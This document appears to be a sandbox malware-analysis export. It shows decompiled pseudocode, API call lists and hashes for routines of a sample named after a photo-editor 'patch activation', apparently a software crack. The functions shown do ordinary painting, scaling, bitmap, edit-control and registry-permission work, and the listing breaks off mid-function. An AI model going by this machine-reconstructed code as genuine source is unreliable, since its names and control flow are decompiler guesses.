GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00448C1C), ref: 00448BF1

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID:
API String ID: 1866314245-0
Opcode ID: f65570b29b0a27634ef974d6eb8ff978e4f675880c5c185e12f7e95dc7652d1b
Instruction ID: 86cd10a4b754a346bbb6b93b1800c6189756eba4f25aae068f18fd67d3000257
Opcode Fuzzy Hash: f65570b29b0a27634ef974d6eb8ff978e4f675880c5c185e12f7e95dc7652d1b
Instruction Fuzzy Hash: B35146B0A001459FDB00EF95C481AAFB7F8EF45315F10817EE414BB396CA789E458B59

Uniqueness

Uniqueness Score: -1.00%

Function 004170BC Relevance: 7.6, APIs: 5, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E004170BC(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagPAINTSTRUCT _v84;
				intOrPtr _t54;
				void* _t63;
				struct HDC__* _t73;
				intOrPtr _t87;
				void* _t94;
				void* _t95;
				void* _t97;
				void* _t99;
				void* _t100;
				intOrPtr _t101;

				_t99 = _t100;
				_t101 = _t100 + 0xffffffb0;
				_v12 = __edx;
				_v8 = __eax;
				_t73 =  *(_v12 + 4);
				if(_t73 == 0) {
					_t73 = BeginPaint(E00418670(_v8),  &_v84);
				}
				_push(_t99);
				_push(0x4171d5);
				_push( *[fs:ecx]);
				 *[fs:ecx] = _t101;
				if( *((intOrPtr*)(_v8 + 0xb0)) != 0) {
					_v20 = SaveDC(_t73);
					_v16 = 2;
					_t94 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xb0)) + 8)) - 1;
					if(_t94 >= 0) {
						_t95 = _t94 + 1;
						_t97 = 0;
						do {
							_t63 = E0040B6DC( *((intOrPtr*)(_v8 + 0xb0)), _t97);
							if( *((char*)(_t63 + 0x37)) != 0 || ( *(_t63 + 0x1c) & 0x00000010) != 0 && ( *(_t63 + 0x35) & 0x00000004) == 0) {
								if(( *(_t63 + 0x34) & 0x00000040) == 0) {
									goto L11;
								} else {
									_v16 = ExcludeClipRect(_t73,  *(_t63 + 0x24),  *(_t63 + 0x28),  *(_t63 + 0x24) +  *((intOrPtr*)(_t63 + 0x2c)),  *(_t63 + 0x28) +  *((intOrPtr*)(_t63 + 0x30)));
									if(_v16 != 1) {
										goto L11;
									}
								}
							} else {
								goto L11;
							}
							goto L12;
							L11:
							_t97 = _t97 + 1;
							_t95 = _t95 - 1;
						} while (_t95 != 0);
					}
					L12:
					if(_v16 != 1) {
						 *((intOrPtr*)( *_v8 + 0x70))();
					}
					RestoreDC(_t73, _v20);
				} else {
					 *((intOrPtr*)( *_v8 + 0x70))();
				}
				E00417210(_v8, 0, _t73);
				_pop(_t87);
				 *[fs:eax] = _t87;
				_push(E004171DC);
				_t54 = _v12;
				if( *((intOrPtr*)(_t54 + 4)) == 0) {
					return EndPaint(E00418670(_v8),  &_v84);
				}
				return _t54;
			}

0x004170bd
0x004170bf
0x004170c5
0x004170c8
0x004170ce
0x004170d3
0x004170e7
0x004170e7
0x004170eb
0x004170ec
0x004170f1
0x004170f4
0x00417101
0x00417118
0x0041711b
0x0041712e
0x00417131
0x00417133
0x00417134
0x00417136
0x00417141
0x0041714a
0x0041715c
0x00000000
0x0041715e
0x00417179
0x00417180
0x00000000
0x00000000
0x00417180
0x00000000
0x00000000
0x00000000
0x00000000
0x00417182
0x00417182
0x00417183
0x00417183
0x00417136
0x00417186
0x0041718a
0x00417193
0x00417193
0x0041719b
0x00417103
0x0041710a
0x0041710a
0x004171a7
0x004171ae
0x004171b1
0x004171b4
0x004171b9
0x004171c0
0x00000000
0x004171cf
0x004171d4

APIs

BeginPaint.USER32(00000000,?), ref: 004170E2
SaveDC.GDI32(?), ref: 00417113
ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,004171D5), ref: 00417174
RestoreDC.GDI32(?,?), ref: 0041719B
EndPaint.USER32(00000000,?,004171DC,00000000,004171D5), ref: 004171CF

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Paint$BeginClipExcludeRectRestoreSave
String ID:
API String ID: 3808407030-0
Opcode ID: 2aefb1f11be775139b331da31e14453598fb34486e2afd9f20f5c966e66715d4
Instruction ID: a59a5e74ec56046a8e44d3172024536881dae92cda495952d4f2aea49f83957e
Opcode Fuzzy Hash: 2aefb1f11be775139b331da31e14453598fb34486e2afd9f20f5c966e66715d4
Instruction Fuzzy Hash: 9C413D70A08204AFDB14DBA9C985FAA77F9FB48314F1544AAE8059B362C7789D81CB18

Uniqueness

Uniqueness Score: -1.00%

Function 00414C90 Relevance: 7.6, APIs: 5, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414C90(intOrPtr* __eax, int __ecx, int __edx) {
				char _t46;
				signed char _t76;
				int _t83;
				intOrPtr* _t84;
				int _t85;
				int* _t87;

				 *_t87 = __ecx;
				_t83 = __edx;
				_t84 = __eax;
				if(__edx !=  *_t87) {
					if(( *(__eax + 0x1c) & 0x00000001) == 0) {
						_t76 =  *E00414D9C; // 0x1f
					} else {
						_t76 =  *((intOrPtr*)(__eax + 0x5c));
					}
					if((_t76 & 0x00000001) == 0) {
						_t85 =  *(_t84 + 0x24);
					} else {
						_t85 = MulDiv( *(_t84 + 0x24), _t83,  *_t87);
					}
					if((_t76 & 0x00000002) == 0) {
						_t87[1] =  *(_t84 + 0x28);
					} else {
						_t87[1] = MulDiv( *(_t84 + 0x28), _t83,  *_t87);
					}
					if((_t76 & 0x00000004) == 0 || ( *(_t84 + 0x35) & 0x00000001) != 0) {
						_t87[2] =  *(_t84 + 0x2c);
					} else {
						_t87[2] = MulDiv( *(_t84 + 0x24) +  *(_t84 + 0x2c), _t83,  *_t87) - _t85;
					}
					if((_t76 & 0x00000008) == 0 || ( *(_t84 + 0x35) & 0x00000002) != 0) {
						_t87[3] =  *(_t84 + 0x30);
					} else {
						_t87[3] = MulDiv( *(_t84 + 0x28) +  *(_t84 + 0x30), _t83,  *_t87) - _t87[1];
					}
					 *((intOrPtr*)( *_t84 + 0x4c))(_t87[4], _t87[2]);
					if( *((char*)(_t84 + 0x39)) == 0 && (_t76 & 0x00000010) != 0) {
						E0041A834( *((intOrPtr*)(_t84 + 0x44)), MulDiv(E0041A818( *((intOrPtr*)(_t84 + 0x44))), _t83,  *_t87));
					}
				}
				_t46 =  *0x414da0; // 0x0
				 *((char*)(_t84 + 0x5c)) = _t46;
				return _t46;
			}

0x00414c97
0x00414c9a
0x00414c9c
0x00414ca1
0x00414cab
0x00414cb2
0x00414cad
0x00414cad
0x00414cad
0x00414cbb
0x00414ccf
0x00414cbd
0x00414ccb
0x00414ccb
0x00414cd5
0x00414cee
0x00414cd7
0x00414ce5
0x00414ce5
0x00414cf5
0x00414d19
0x00414cfd
0x00414d10
0x00414d10
0x00414d20
0x00414d46
0x00414d28
0x00414d3d
0x00414d3d
0x00414d5e
0x00414d65
0x00414d85
0x00414d85
0x00414d65
0x00414d8a
0x00414d8f
0x00414d99

APIs

MulDiv.KERNEL32(?,?,?), ref: 00414CC6
MulDiv.KERNEL32(?,?,?), ref: 00414CE0
MulDiv.KERNEL32(?,?,?), ref: 00414D09
MulDiv.KERNEL32(?,?,?), ref: 00414D34
MulDiv.KERNEL32(00000000,?,00000000), ref: 00414D7C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6723b5202e330dc32e4e910c1744c1f6af12d9a6ca138e20ff4de4c990d11818
Instruction ID: b7433d6af5671a809cf87ab508426f3e85ed5e2fdb4bb50135625d5106dc29cf
Opcode Fuzzy Hash: 6723b5202e330dc32e4e910c1744c1f6af12d9a6ca138e20ff4de4c990d11818
Instruction Fuzzy Hash: 1B3170706057009FC720EB2DC884AABB7E8AF89710F04891EF9D5C3751D238EC808B59

Uniqueness

Uniqueness Score: -1.00%

Function 0041C048 Relevance: 7.6, APIs: 5, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0041C048(BITMAPINFOHEADER* __eax, void* __ebx, intOrPtr __ecx, intOrPtr* __edx, void* __esi, void* __eflags) {
				BITMAPINFOHEADER* _v8;
				intOrPtr _v12;
				struct HBITMAP__* _v16;
				struct HDC__* _v20;
				void* _v24;
				int _v28;
				char _v32;
				BITMAPINFO* _t53;
				intOrPtr* _t67;
				intOrPtr _t87;
				signed int _t89;
				void* _t91;
				void* _t92;
				intOrPtr _t93;

				_t91 = _t92;
				_t93 = _t92 + 0xffffffe4;
				_v12 = __ecx;
				_t67 = __edx;
				_v8 = __eax;
				_v32 = GetSystemMetrics(0xb);
				_v28 = GetSystemMetrics(0xc);
				_v8->biHeight = _v8->biHeight >> 1;
				_v8->biSizeImage = E0041C034(_v8->biWidth * (_v8->biBitCount & 0x0000ffff)) * _v8->biHeight;
				_t89 = E0041B978(_v8->biBitCount);
				_v20 = GetDC(0);
				if(_v20 == 0) {
					E0041B824();
				}
				_push(_t91);
				_push(0x41c20d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t93;
				_t53 = _v8;
				_v24 =  &(( &(_t53->bmiColors))[_t89]);
				_v16 = CreateDIBitmap(_v20, _v8, 4, _v24, _t53, 0);
				if(_v16 == 0) {
					E0041B824();
				}
				_push(_t91);
				_push(0x41c130);
				_push( *[fs:eax]);
				 *[fs:eax] = _t93;
				 *_t67 = E0041B83C(_v16, 0,  &_v32);
				_pop(_t87);
				 *[fs:eax] = _t87;
				_push(E0041C137);
				return DeleteObject(_v16);
			}

0x0041c049
0x0041c04b
0x0041c050
0x0041c053
0x0041c055
0x0041c05f
0x0041c069
0x0041c06f
0x0041c08f
0x0041c09e
0x0041c0a7
0x0041c0ae
0x0041c0b0
0x0041c0b0
0x0041c0b7
0x0041c0b8
0x0041c0bd
0x0041c0c0
0x0041c0c3
0x0041c0d2
0x0041c0ee
0x0041c0f5
0x0041c0f7
0x0041c0f7
0x0041c0fe
0x0041c0ff
0x0041c104
0x0041c107
0x0041c117
0x0041c11b
0x0041c11e
0x0041c121
0x0041c12f

APIs

GetSystemMetrics.USER32 ref: 0041C05A
GetSystemMetrics.USER32 ref: 0041C064
GetDC.USER32(00000000), ref: 0041C0A2
CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041C0E9
DeleteObject.GDI32(00000000), ref: 0041C12A

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: MetricsSystem$BitmapCreateDeleteObject
String ID:
API String ID: 1095203571-0
Opcode ID: 142aaef5fb75dc877dec10a7682396b9e25510c94f542f6073738a5e6d3aa482
Instruction ID: af0cd6ff41168786fc466cfb62adbf741af89e47da0ede509f3e80318da31809
Opcode Fuzzy Hash: 142aaef5fb75dc877dec10a7682396b9e25510c94f542f6073738a5e6d3aa482
Instruction Fuzzy Hash: 92314174E40205EFDB00DFA5C981AAEB7F5EB48704F1185AAF510AB381D7789E80DF98

Uniqueness

Uniqueness Score: -1.00%

Function 00429C5C Relevance: 7.6, APIs: 5, Instructions: 83
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00429C5C(void* __eax, void* __ebx, intOrPtr __ecx, int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				long _t27;
				long _t34;
				int _t42;
				int _t43;
				intOrPtr _t50;
				int _t54;
				void* _t57;
				void* _t60;

				_v12 = 0;
				_v8 = __ecx;
				_t54 = __edx;
				_t57 = __eax;
				_push(_t60);
				_push(0x429d47);
				_push( *[fs:eax]);
				 *[fs:eax] = _t60 + 0xfffffff8;
				if(__edx >= 0) {
					_t42 = SendMessageA(E00418670( *((intOrPtr*)(__eax + 8))), 0xbb, __edx, 0);
					if(_t42 < 0) {
						_t43 = SendMessageA(E00418670( *((intOrPtr*)(_t57 + 8))), 0xbb, _t54 - 1, 0);
						if(_t43 >= 0) {
							_t27 = SendMessageA(E00418670( *((intOrPtr*)(_t57 + 8))), 0xc1, _t43, 0);
							if(_t27 != 0) {
								_t42 = _t43 + _t27;
								E004035C0( &_v12, _v8, 0x429d60);
								goto L6;
							}
						}
					} else {
						E004035C0( &_v12, 0x429d60, _v8);
						L6:
						SendMessageA(E00418670( *((intOrPtr*)(_t57 + 8))), 0xb1, _t42, _t42);
						_t34 = E00403738(_v12);
						SendMessageA(E00418670( *((intOrPtr*)(_t57 + 8))), 0xc2, 0, _t34);
					}
				}
				_pop(_t50);
				 *[fs:eax] = _t50;
				_push(0x429d4e);
				return E00403400( &_v12);
			}

0x00429c67
0x00429c6a
0x00429c6d
0x00429c6f
0x00429c73
0x00429c74
0x00429c79
0x00429c7c
0x00429c81
0x00429c9d
0x00429ca1
0x00429ccc
0x00429cd0
0x00429ce3
0x00429cea
0x00429cec
0x00429cf9
0x00000000
0x00429cf9
0x00429cea
0x00429ca3
0x00429cae
0x00429cfe
0x00429d0e
0x00429d16
0x00429d2c
0x00429d2c
0x00429ca1
0x00429d33
0x00429d36
0x00429d39
0x00429d46

APIs

SendMessageA.USER32 ref: 00429C98
SendMessageA.USER32 ref: 00429CC7
SendMessageA.USER32 ref: 00429CE3
SendMessageA.USER32 ref: 00429D0E
SendMessageA.USER32 ref: 00429D2C

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bc63629cb27ad13ca6417472d4f3f1d186b1f81fbb10e3d200fe59e3d4f08092
Instruction ID: 60921b255c01a359d0eb68e62e5e28d9b6fe2da514f119f30b014399c46582d3
Opcode Fuzzy Hash: bc63629cb27ad13ca6417472d4f3f1d186b1f81fbb10e3d200fe59e3d4f08092
Instruction Fuzzy Hash: C121AF707007057AD710ABA7DC82F4BB6ACDB40708F90043EB501AB2D2DB78AD41866D

Uniqueness

Uniqueness Score: -1.00%

Function 00475178 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E00475178(char __eax, void* __ebx, intOrPtr __ecx, char __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _t27;
				signed int _t31;
				intOrPtr _t60;
				intOrPtr _t63;
				void* _t68;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v28 = 0;
				_t63 = __ecx;
				_t65 = __edx;
				_v5 = __eax;
				_push(_t68);
				_push(0x475241);
				_push( *[fs:eax]);
				 *[fs:eax] = _t68 + 0xffffffe0;
				E00453DAC(__edx,  &_v28);
				_v24 = _v28;
				_v20 = 0xb;
				_v16 = _t63;
				_v12 = 0xb;
				E004587AC("Setting permissions on key: %s\\%s", 0, 1,  &_v24, _t63, __edx);
				_t27 =  *0x49f370; // 0x2252ad4
				_t46 = E0040B6DC(_t27, _a4);
				_t31 = E00403574( *_t28);
				asm("cdq");
				_t50 = _t63;
				if(E0045D8DC(_v5, _t46, _t63, __edx, _t63, __edx, _t31 / 0x14,  *_t46) == 0) {
					if(GetLastError() != 2) {
						_v36 = GetLastError();
						_v32 = 0;
						E004587AC("Failed to set permissions on the key (%d).", _t46, 0,  &_v36, _t63, _t65);
					} else {
						E004585A0("Could not set permissions on the key because it currently does not exist.", _t46, _t50, _t63, _t65);
					}
				}
				_pop(_t60);
				 *[fs:eax] = _t60;
				_push(0x475248);
				return E00403400( &_v28);
			}

0x0047517e
0x0047517f
0x00475180
0x00475183
0x00475186
0x00475188
0x0047518a
0x0047518f
0x00475190
0x00475195
0x00475198
0x004751a0
0x004751a8
0x004751ab
0x004751af
0x004751b2
0x004751c3
0x004751cb
0x004751d5
0x004751dc
0x004751e6
0x004751ea
0x004751f8
0x00475202
0x00475215
0x00475218
0x00475226
0x00475204
0x00475209
0x00475209
0x00475202
0x0047522d
0x00475230
0x00475233
0x00475240

APIs

Part of subcall function 0045D8DC: SetLastError.KERNEL32(00000057,00000000,0045D9A8,?,?,?,?,00000000), ref: 0045D947

GetLastError.KERNEL32(00000000,00000000,00000000,00475241,?,?,0049F1E4,00000000), ref: 004751FA
GetLastError.KERNEL32(00000000,00000000,00000000,00475241,?,?,0049F1E4,00000000), ref: 00475210

Strings

Could not set permissions on the key because it currently does not exist., xrefs: 00475204
Failed to set permissions on the key (%d)., xrefs: 00475221
Setting permissions on key: %s\%s, xrefs: 004751BE

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ErrorLast
String ID: Could not set permissions on the key because it currently does not exist.$Failed to set permissions on the key (%d).$Setting permissions on key: %s\%s
API String ID: 1452528299-522033246
Opcode ID: 1355e60d520c537b245591eb314ca0669cdd5b0204c3c9ddf5a0d2ec40fba8e3
Instruction ID: 51041ab3257bc5012ea3fc5fd74b59e1bc6a173a0ae5939bb589f078bf527dbc
Opcode Fuzzy Hash: 1355e60d520c537b245591eb314ca0669cdd5b0204c3c9ddf5a0d2ec40fba8e3
Instruction Fuzzy Hash: 0821A770A046045FDB00EBA9D8416DEBBF4EB89314F5044BBE404EB353DBB85D058BAD

Uniqueness

Uniqueness Score: -1.00%

Function 00403CA4 Relevance: 7.6, APIs: 5, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00403CA4(char* __eax) {
				short _v2064;
				short* _t8;
				short* _t15;
				char* _t16;
				short* _t17;
				int _t18;
				int _t19;

				_t16 = __eax;
				_t18 = E00403574(__eax);
				if(E00403574(_t16) >= 0x400) {
					_t8 = MultiByteToWideChar(0, 0, _t16, _t18, 0, 0);
					_t19 = _t8;
					_push(_t19);
					_push(0);
					L004012C8();
					_t17 = _t8;
					MultiByteToWideChar(0, 0, _t16, _t18, _t17, _t19);
				} else {
					_push(MultiByteToWideChar(0, 0, E00403738(_t16), _t18,  &_v2064, 0x400));
					_t15 =  &_v2064;
					_push(_t15);
					L004012C8();
					_t17 = _t15;
				}
				return _t17;
			}

0x00403cae
0x00403cb7
0x00403cc5
0x00403cfc
0x00403d01
0x00403d03
0x00403d04
0x00403d06
0x00403d0b
0x00403d15
0x00403cc7
0x00403ce3
0x00403ce4
0x00403ce8
0x00403ce9
0x00403cee
0x00403cee
0x00403d26

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403CFC
SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00403D06
MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403D15

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 5ebc352aac4f77473dff7e3dcc86cc0c7398385e60e6a11f17e44d50ff4a2e93
Instruction ID: 657f84db466bd1c54801a2b30447fc2084338491f8142acf58a262d5883cef98
Opcode Fuzzy Hash: 5ebc352aac4f77473dff7e3dcc86cc0c7398385e60e6a11f17e44d50ff4a2e93
Instruction Fuzzy Hash: FCF0A4917442043BF21025A65C43F6B198CCB82B9BF50053FB704FA1D2D87C9D04427D

Uniqueness

Uniqueness Score: -1.00%

Function 00414870 Relevance: 7.6, APIs: 5, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00414870(intOrPtr* __eax, void* __ecx, signed int __edx, void* __eflags) {
				void* _v4;
				intOrPtr _v7;
				char _v19;
				struct HWND__* _v36;
				char _v39;
				void* __ebx;
				struct HDC__* _t26;
				struct HPALETTE__* _t34;
				struct HPALETTE__* _t35;
				intOrPtr* _t36;
				void* _t37;
				signed int* _t38;

				_t38 = _t37 + 0xfffffff8;
				 *_t38 = __edx;
				_t36 = __eax;
				_v19 = 0;
				_t34 = E00402C00(__eax, 0xffef, __ecx, __eflags);
				if(_t34 != 0) {
					_t26 =  *((intOrPtr*)( *_t36 + 0x30))();
					_t35 = SelectPalette(_t26, _t34, ( *_t38 ^ 0x00000001) & 0x0000007f);
					if(RealizePalette(_t26) != 0) {
						 *((intOrPtr*)( *_t36 + 0x44))();
					}
					SelectPalette(_t26, _t35, 1);
					RealizePalette(_t26);
					ReleaseDC(_v36, _t26);
					_v39 = 1;
				}
				return _v7;
			}

0x00414873
0x00414876
0x00414879
0x0041487b
0x0041488b
0x0041488f
0x0041489c
0x004148ae
0x004148b8
0x004148be
0x004148be
0x004148c5
0x004148cb
0x004148d6
0x004148db
0x004148db
0x004148e9

APIs

SelectPalette.GDI32(00000000,00000000,00000000), ref: 004148A9
RealizePalette.GDI32(00000000), ref: 004148B1
SelectPalette.GDI32(00000000,00000000,00000001), ref: 004148C5
RealizePalette.GDI32(00000000), ref: 004148CB
ReleaseDC.USER32 ref: 004148D6

Memory Dump Source

Source File: 00000016.00000002.498488432.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.498477952.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500477326.000000000049C000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500607953.000000000049D000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500726505.000000000049E000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000016.00000002.500953897.00000000004AE000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_A1Photo-&-Art-Enhancer_Search&Patch_Activation.jbxd

Similarity

API ID: Palette$RealizeSelect$Release
String ID:
API String ID: 2261976640-0
Opcode ID: de0628dfb3b178927ad573b2282efd4894c3506f2a3e842425f6db2cbe849912
Instruction ID: 1b199f70f0334c5ad2d95ba866badc65d16692e0f82b4d98eea4daff33ed8e78
Opcode Fuzzy Hash: de0628dfb3b178927ad573b2282efd4894c3506f2a3e842425f6db2cbe849912
Instruction Fuzzy Hash: 8901DF7521C3806AE200B63D8C85A9F6FEC9FCA314F05596EF498DB382CA7ACC018765

Uniqueness

Uniqueness Score: -1.00%

Function 00485444 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00485444(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr* _v8;
				char _v9;
				char _v10;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				void* _t61;
				void* _t68;
				intOrPtr _t86;
				intOrPtr _t125;
				signed int _t133;
				intOrPtr _t154;
				intOrPtr _t159;
				intOrPtr _t164;
				intOrPtr _t165;
				void* _t167;
				intOrPtr _t174;
				intOrPtr _t182;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t195;
				intOrPtr _t196;
				intOrPtr _t198;
				intOrPtr _t206;
				void* _t211;
				void* _t212;
				intOrPtr _t213;
				void* _t221;

				_t221 = __fp0;
				_t208 = __esi;
				_t207 = __edi;
				_t163 = __ecx;
				_t211 = _t212;
				_t213 = _t212 + 0xffffffe4;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v32 = 0;
				_v20 = 0;
				_v16 = 0;
				_v8 = __eax;
				_push(_t211);
				_push(0x485795);
				_push( *[fs:eax]);
				 *[fs:eax] = _t213;
				_v9 = 0;
				_push(_t211);
				_push(0x485749);
				_push( *[fs:eax]);
				 *[fs:eax] = _t213;
				_t61 = E0046D9D0( *0x49f0ac, __ecx, 0);
				_t215 = _t61;
				if(_t61 == 0) {
					E00409070();
				}
				E00414F78( *((intOrPtr*)( *0x49f0ac + 0x20c)),  &_v20, _t215);
				E00403450(0x49f3cc, 0x49f0ac, _v20, _t207, _t208);
				_t68 = E0046DD28( *0x49f0ac, 0x49f0ac, _t163, _t207, _t208, _t215);
				_t216 = _t68;
				if(_t68 == 0) {
					E00409070();
				}
				E00414F78( *((intOrPtr*)( *0x49f0ac + 0x210)),  &_v20, _t216);
				E00403450(0x49f3d0, 0x49f0ac, _v20, _t207, _t208);
				 *0x49f3d4 = E0042B554( *((intOrPtr*)( *0x49f0ac + 0x214)));
				 *0x49f3d8 = E0046ADD8( *0x49f0ac);
				_t164 =  *0x49f3e0; // 0x2252a28
				_t182 =  *0x49f3dc; // 0x22529fc
				E0046B36C( *0x49f0ac, _t164, _t182);
				_t165 =  *0x49f3e8; // 0x2252a80
